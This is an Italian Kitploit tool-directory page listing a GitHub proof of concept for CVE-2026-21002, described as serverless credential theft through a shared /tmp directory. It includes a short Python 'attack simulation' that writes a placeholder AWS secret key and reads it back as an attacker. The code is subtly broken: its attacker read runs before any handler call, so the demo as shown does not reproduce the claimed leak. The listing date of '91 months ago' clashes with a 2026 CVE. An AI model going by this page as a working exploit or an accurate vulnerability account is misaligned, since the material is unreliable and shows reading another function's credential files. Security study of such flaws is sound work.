Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/george0papasotiriou/cve-2026-21002-serverless-cold-start-credential-leakage-via-reused-tmp
Sicurezza dell'Infrastruttura CloudAnalisi delle VulnerabilitàExploitSicurezza ServerlessEsfiltrazione DatiSicurezza CloudApprendimento e Formazione
GitHubgeorge0papasotiriou/cve-2026-21002-serverless-cold-start-credential-leakage-via-reused-tmp

CVE-2026-21002-Serverless-Cold-Start-Credential-Leakage-via-Reused-tmp

Exploit PoC per CVE-2026-21002 sulla perdita di credenziali al cold-start serverless, che dimostra come le directory /tmp riutilizzate di Lambda espongano i segreti AWS ad altre funzioni.

Vedi Repository
91 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-21002 – Perdita di credenziali nell'avvio a freddo serverless tramite /tmp riutilizzato

Codice del programma (simulazione AWS Lambda in Python)

root@kitploit:~
# lambda_func_sim.py - Simulated serverless function
import os, tempfile, time

SECRET_FILE = '/tmp/credentials'  # reused across warm starts

def handler(event):
    # On first invocation, write a secret
    if not os.path.exists(SECRET_FILE):
        with open(SECRET_FILE, 'w') as f:
            f.write("AWS_SECRET_ACCESS_KEY=sk-123456")
        return "Initialized"
    # Later invocations can read it
    with open(SECRET_FILE) as f:
        return f.read()

# Attack simulation: attacker shares the same /tmp in another function (same VM)
# They can read /tmp/credentials after a cold start.
with open(SECRET_FILE) as f:
    print("Attacker reads:", f.read())

CVE-2026-21002 – Perdita di credenziali nell'avvio a freddo serverless

Severity: Critical

Panoramica

Le piattaforme serverless riutilizzano l'ambiente di esecuzione (inclusa la directory /tmp) tra diverse invocazioni di funzione e persino tra funzioni diverse dello stesso account. Una funzione di un attaccante può leggere file sensibili lasciati in /tmp da un'altra funzione dopo un avvio a freddo, portando al furto di credenziali.

Dettagli della vulnerabilità

  • Tipo: Divulgazione di informazioni / perdita tra funzioni
  • Impatto: Compromissione delle credenziali, movimento laterale.
  • Causa principale: La directory /tmp è condivisa tra contenitori caldi senza isolamento tra le funzioni.

Dimostrazione dell'exploit

Esegui la simulazione:

root@kitploit:~
python lambda_func_sim.py

L'attaccante legge AWS_SECRET_ACCESS_KEY lasciata dalla funzione vittima.

Scarica lo strumento